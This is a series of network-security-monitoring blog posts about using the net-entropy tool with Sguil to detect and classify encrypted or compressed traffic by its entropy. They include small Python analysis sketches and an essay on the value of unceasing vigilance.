The rest of the net-entropy saga is listed here, but to briefly recap, net-entropy is a tool that can be used to profile the level of “randomness” of network traffic. High entropy traffic like this is usually either encrypted or compressed in nature, and I’m definitely interested in knowing about the presence of the former on my network. I’ve been using net-entropy as a general purpose “randomness detector”, something that the author didn’t really have in mind when he wrote it.

However, drawing meaningful conclusions from the results gathered can be tricky (this is nothing to do with net-entropy itself, and everything to do with the way I’m using it backwards to generically detect randomness). Some of the observed high entropy traffic will definitely fall into the “encrypted” category, like SSH and Remote Desktop. Other stuff will definitely be of the “compressed” flavour, like RTMP on port 1935.

Once this kind of low-hanging fruit has been pruned, the analyst is left with a whole load of unknown high-entropy traffic. If net-entropy’s presence is to be of any value at all when deployed this way, we have to try to make sense of the residual data in some way or another.

One tactic is to fire up Sguil and use its full-content capture to extract and examine each of the unknown high-entropy streams in turn. This is massively labour intensive, but some of the time you’ll find something interesting like HTTPS on a non-standard port (the certificate exchange at the start of the conversation is in clear text, giving you a clue). Most of the time however, you’re left looking at unintelligible garbage. Unsurprising really, given that it’s likely to be either compressed or encrypted…

Given that protocols like SSH, RDP and RTMP can most usually be identified by their port numbers alone and what’s left is unreadable junk, how are we to derive value from these other indicators from net-entropy? I can think of a couple of ways:

  • Session contextualisation
  • Session profiling on the basis of session duration and frequency, etc

Putting a high-entropy session into context isn’t too labour intensive, and sometimes pays dividends. Let’s say net-entropy has spotted a session from 1.2.3.4:25333 to 4.3.2.1:3377; the full-content capture is unreadable garbage, and the port numbers offer no clues. If we ask the question “was there any other traffic involving 1.2.3.4 and 4.3.2.1 at the same time”, we might get a hint. In this instance, there was a connection from 1.2.3.4:16060 to 4.3.2.1:21, which looks like an FTP command session judging by the port number. When we examine the full-content capture for this session, we can see passive FTP at work:

227 Entering Passive Mode (4,3,2,1,13,49).

The last two numbers denote the port that the client should connect to to transfer a file. Doing the maths, we see that (13 * 256) + 49 = 3377, so we can be pretty confident that our high-entropy traffic in this case was a file transferred over FTP.
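
That arithmetic is worth wrapping in a helper if you do it often; a tiny Python sketch that pulls the data-channel endpoint out of a passive-mode reply:

    import re

    def passive_ftp_endpoint(reply):
        # "227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)" -> (ip, p1*256 + p2)
        numbers = re.search(r"\((\d+,\d+,\d+,\d+,\d+,\d+)\)", reply).group(1)
        h1, h2, h3, h4, p1, p2 = (int(n) for n in numbers.split(","))
        return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2

    print(passive_ftp_endpoint("227 Entering Passive Mode (4,3,2,1,13,49)."))
    # ('4.3.2.1', 3377) - matching the high-entropy session net-entropy flagged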

If context can’t be established however, all is not lost – we can look at other attributes of the traffic.

A lot of the high-entropy traffic that we see is bound for random ports on IP addresses all over the world, and most of it is related to peer-to-peer apps. In the case of Skype, high-entropy TCP traffic is usually signaling traffic to SuperNodes. Traffic to a given SuperNode will occur little-and-often for a long period of time until one of the two endpoints goes offline, so net-entropy will be sending you alerts all day long for that specific destination. However, you certainly can’t say for sure that traffic matching this profile is definitely Skype (it could be a keylogger phoning home at regular intervals, for example). As such, examination of the little-and-often class of high-entropy flow doesn’t usually yield any definitive conclusion.

What is definitely interesting is where you have many high-entropy flows to the same destination address and port in a short period of time. We have detected the following by taking this “clustering” approach:

  • HTTP on a non-standard port, serving up images (most image formats are compressed, and thereby have a high-entropy signature). As an example, some of the images in search results here come from port 7777. Someone browsing this site will trigger many indicators from net-entropy in a short space of time that refer to this port.
  • HTTP proxies. Again, the high-entropy traffic is most commonly as a result of images being transferred.
  • SSL/TLSv1 on port 8083, which turned out to be traffic to a SecureSphere web application firewall.
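
For illustration, a minimal Python sketch of the clustering idea: group net-entropy indicators by destination IP and port, and flag any destination that is hit repeatedly within a short window. The (timestamp, dst_ip, dst_port) tuple format is my own assumption, not something net-entropy emits:

    from collections import defaultdict
    from datetime import timedelta

    def clusters(alerts, window=timedelta(minutes=10), threshold=5):
        by_dest = defaultdict(list)
        for ts, dst_ip, dst_port in alerts:
            by_dest[(dst_ip, dst_port)].append(ts)
        hits = []
        for dest, times in by_dest.items():
            times.sort()
            for i, start in enumerate(times):
                # count alerts falling within `window` of this one
                n = sum(1 for t in times[i:] if t - start <= window)
                if n >= threshold:
                    hits.append((dest, n))
                    break
        return hits

    # Anything returned here - e.g. (("10.0.0.5", 8083), 12) - is "worth looking at".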

Clusters like this are most easily detected by eye by means of visualisation. The following image is from one of my Cisco MARS reports, and shows a cluster of traffic to port 8083 in orange:

Something “worth looking at” will usually be quite clear from an image like this.

The approach I’ve taken with net-entropy has yielded neither precise nor definitive results (which certainly isn’t a complaint about net-entropy itself – it was never designed to be used the way I’m using it). But, I’ve discovered things that I’d never have known about without it, so I reckon I’ve come out on top!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Securitas Vigilantiae Instantis Praemium

Posted in General Security, NSM, Why watch the wire? on 28 October, 2009 by Alec Waters

The inner title page of MI5’s authorised history shows one of the Service’s past logos, bearing the motto: “Securitas Vigilantiae Instantis Praemium”, intended to mean “Security is the reward of unceasing vigilance”. This seems to me to be as good a motto now as it was seventy years ago.

An enterprise has numerous tools at its disposal to control what happens on its infrastructure. Some examples are technical controls (such as port filtering, or blocking access to certain types of website) and non-technical controls (such as Acceptable Use Policies, violation of which could lead to disciplinary action).

Controls like these describe what you hope should be happening on your network, which isn’t necessarily what is happening. Controls may have been:

  • Intended, but not actually implemented at all
  • Improperly implemented
  • Removed
  • Changed
  • Circumvented (intentionally or otherwise)
  • Or they may not be as effective as you’d have hoped (anti-virus is a good example).

Implementing a control and then leaving it to its own devices doesn’t seem like a viable tactic. Rather than believing it to be effective, we need to make sure it is effective through strategies like the collection of information and the (unceasing) vigilance to detail required to extract the greatest meaning from it.

By doing this, you can verify the effectiveness of your controls. When things go wrong, you can use what you’ve collected to help you understand what happened and how you can modify your controls to help prevent it from happening again.

Without vigilance, we have our head in the sand, hoping for the best. If our vigilance is not unceasing, Murphy’s Law dictates that something Bad will happen the moment we take our eye off the ball.

“Securitas Vigilantiae Instantis Praemium” hardly ranks as catchy, but it certainly hits the nail on the head. Well, one of the nails, anyway.


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

net-entropy Sguil agent and wiki

Posted in net-entropy, NSM, Sguil on 6 October, 2009 by Alec Waters

The story so far:

I’ve written a basic Sguil agent that will upload net-entropy’s RISING ALARM messages into Sguil. You can download the agent here, and the config file here.

On a Sguil sensor that has net-entropy installed, copy the agent to wherever your other agents live (/usr/local/bin on my system), and the config file to where your other config files live (/etc/nsm/sensor1/ on my system). Then fire it up:

net-entropy_agent.tcl -c /etc/nsm/sensor1/net-entropy_agent.conf

With a bit of luck, you’ll see the agent register in the Sguil client:

net-entropy sguil

And we’ll start to see net-entropy messages appear, too:

net-entropy sguil events

The bottom right pane of the Sguil client will behave as it does for the PADS agent, and will show you the event detail:

net-entropy sguil detail

Sguil will correlate these events in the usual fashion, and allow you to right-click and say “Transcript” or “Wireshark”. It all seems to work pretty well!

Finally, the net-entropy project has a new wiki – it’s here. This is the place to go for the latest source code, which now includes a Paninski entropy estimator in addition to the original Shannon estimator. Have fun!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Detecting encrypted traffic with net-entropy, part two

Posted in Crazy Plans, net-entropy, NSM on 24 September, 2009 by Alec Waters

Back here I described my setup of a modified version of net-entropy, which I was going to use in my quest to detect encrypted traffic. Well, it’s been running for a week or so now, and I’ve got some results.

  • Did it detect encrypted traffic? Yes!
  • Did it detect stuff that wasn’t encrypted? Yes!
  • Did it fail to detect traffic that definitely was encrypted? Yes!
  • Was the experiment a total failure and a complete waste of time? No! Far from it, in fact.

The theory I was testing was that traffic with sufficient entropy might be encrypted, since high entropy is a property of decent encryption algorithms. net-entropy was set to trigger an alert if it saw any connections whose entropy crossed an arbitrarily chosen threshold of 7.9 (8.0 is the maximum), and protocols that were expected to be encrypted (HTTPS, etc.) were filtered out.
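
net-entropy itself is written in C and does considerably more, but for illustration here’s the underlying arithmetic in Python: a Shannon entropy estimate (bits per byte, maximum 8.0) evaluated cumulatively as a stream grows, with the arbitrary 7.9 threshold applied:

    import math
    import os
    from collections import Counter

    def shannon_entropy(data):
        # Bits per byte; 8.0 is the theoretical maximum for byte-oriented data.
        counts = Counter(data)
        total = len(data)
        return -sum((n / total) * math.log2(n / total) for n in counts.values())

    def bytes_until_alert(payload, threshold=7.9, step=1024):
        # Evaluate the entropy cumulatively as the stream grows, which is how
        # the per-stream graphs later in this post are drawn.
        for end in range(step, len(payload) + 1, step):
            if shannon_entropy(payload[:end]) >= threshold:
                return end      # bytes seen when the threshold was crossed
        return None

    print(bytes_until_alert(os.urandom(65536)))   # random data alerts within a few KB
    print(bytes_until_alert(b"A" * 65536))        # repetitive data never does (None)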

Here’s a summary of what I’ve found so far:

  • Encrypted traffic that crossed the 7.9 threshold included Windows Remote Desktop (RDP), Skype (both calls and signalling traffic), SSH-2, and Google Talk.
  • Unencrypted traffic that crossed the threshold was mainly RTMP (streaming Flash audio/video), and possibly Spotify (I don’t know for sure if Spotify uses encryption or not, but high entropy was observed both on the inbound media from port 4070 and the outbound media on random ports). Media protocols like this are usually highly compressed – high entropy is a side effect of compression as well as encryption.
  • Encrypted traffic that was not detected included SSH-1 (1.5, to be exact). SSH-2 was detected as one would hope, provided that the session was long enough.

Clearly my blunt approach of a single threshold isn’t the most effective one, as we have both false positives and false negatives. But after applying some visualisations to my results, an intriguing possibility presents itself.

net-entropy was installed in this instance on a Sguil box mainly so that it was in a position where it could see a large volume of real-world traffic. A happy side effect of this is that it’s quite simple to extract the raw traffic captures that each net-entropy alert is referring to. If we’ve built net-entropy with the --enable-statistics option, we are then in a position to draw graphs of the entropy of an individual TCP stream:

  • First, use the net-entropy alert to extract the specific TCP stream. The easiest way to do this is to search for it using the Sguil client, and then export the results to Wireshark. Let’s save the capture as session.raw
  • Then we run net-entropy over it in statistics mode:
    $ net-entropy -r session.raw -s mystatsdir -F -b -c net-entropy.conf
  • The output of this is a .dat file whose name is made up of a timestamp and the source and dest IP addresses and ports.
  • We can now plot this file in gnuplot:
    plot 'mystatsdir/whateveritwascalled.dat'

By way of a baseline, here is a plot showing the entropy of the first 64KB of an HTTPS and an SSH-2 session. The blue line marks the 7.9 alerting threshold:

net-entropy baseline

Zooming in a little, we can see that HTTPS crossed the threshold after about 2.2KB of data, and SSH-2 took a little longer:

net-entropy zoom

Let’s zoom in a little on a different area of the graph – the little “wobble” on the SSH-2 line:

net-entropy ssh-2

What we’re looking at here is the part of the conversation where the various parameters of the SSH-2 session are being exchanged (key exchange protocol, encryption/hashing algorithms, etc). These are passed as cleartext, hence the low entropy at this point.

It’s an interesting little pattern, though. Let’s overlay some more SSH sessions onto the one above and see what they look like:

net-entropy ssh

There are three sessions illustrated here:

  • The blue line is an SSH-2 session, which in the context of this experiment is a “true positive” since it was encrypted and it did cross the 7.9 threshold
  • The red line is another SSH-2 session which was so short in duration it didn’t manage to make it above 7.9. This is a “false negative” because we’ve missed something that definitely was encrypted.
  • The green line is an SSH-1 session. At no point during this session’s life did it cross the 7.9 threshold – another false negative.

As far as detecting encrypted traffic goes, this clearly isn’t as useful as I’d have hoped. But look at the red and blue lines – look how tightly they follow one another:

net-entropy ssh zoom

This brings us to the intriguing possibility I alluded to earlier – using entropy analysis not for the detection of encrypted traffic, but for the classification of traffic.

What if the entropy of certain types of traffic is reasonably consistent? What if the patterns above represent “fingerprints” for SSH-1 and SSH-2 traffic? If we could match traffic against a library of fingerprints, we’d have a port-independent classifier of sorts.
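
For illustration, a toy Python sketch of the fingerprinting idea: represent each protocol by a reference entropy curve (entropy sampled at fixed byte offsets) and classify a new session by whichever reference it sits closest to. The reference values and the distance measure below are made-up assumptions, not a tested classifier:

    def distance(curve_a, curve_b):
        # Mean absolute difference over the overlapping part of the two curves.
        n = min(len(curve_a), len(curve_b))
        return sum(abs(a - b) for a, b in zip(curve_a[:n], curve_b[:n])) / n

    def classify(session_curve, fingerprints):
        scores = {name: distance(session_curve, ref)
                  for name, ref in fingerprints.items()}
        return min(scores, key=scores.get), scores

    # Toy reference curves (entropy after 1KB, 2KB, 3KB, ...):
    fingerprints = {
        "ssh-2": [5.9, 7.4, 7.8, 7.92, 7.95],
        "ssh-1": [5.5, 6.8, 7.1, 7.3, 7.4],
        "rdp":   [6.5, 7.6, 7.85, 7.93, 7.96],
    }
    print(classify([5.8, 7.3, 7.8, 7.9, 7.94], fingerprints))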

I’ve not had time yet to analyse sample sets large enough to be anywhere approaching conclusive, but let’s look at some other kinds of traffic:

The following graph shows four RTMP sessions:

net-entropy rtmp

Whilst RTMP isn’t encrypted, all four sessions have a similar visual fingerprint.

Now let’s look at nine RDP sessions (Windows Remote Desktop):

net-entropy rdp

The most obvious outlier here is the black line – this was an RDP session to a server whose encryption level was set to “Low”. If we zoom in a bit, we’ll see another outlier:

net-entropy rdp zoom

The orange line is significantly different to the others. This particular session sent the string “Cookie: mstshash=machinename” in the first data segment sent from the client to the server – the other sessions had mostly zeroes instead, hence the lower entropy at this point. Since this is the very first data segment in the session, we could possibly infer that we’re looking at different client software used to make the connection. Indeed, if we look at RDP sessions from rdesktop (rather than the Windows client), the entropy looks different still:

net-entropy rdp rdesktop

The entropy is low, relative to the Windows client, and there’s a slightly different signature at the start of the connection:

net-entropy rdp rdesktop zoom

One might be tempted to think that one could look at graphs like these and infer something about both the server (encryption level in use) and the client (type of software used).

OK. Enough graphs. Summary time.

Detecting encrypted traffic with a straightforward entropy threshold doesn’t seem to be useful. However, we may be able to use entropy analysis as a means to classify traffic in a port-independent manner, but I’ve analysed nowhere near enough traffic to assess whether this could be a viable technique or not (there are bound to be loads of outlying cases that don’t fit the profile). And even if it is a viable technique, are the bases already covered by other port-independent classifiers (l7filter, et al)? That said, I’m not the first person to explore various visualisations of encrypted traffic, so someone somewhere considers the broad concept useful.

Comments welcome!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk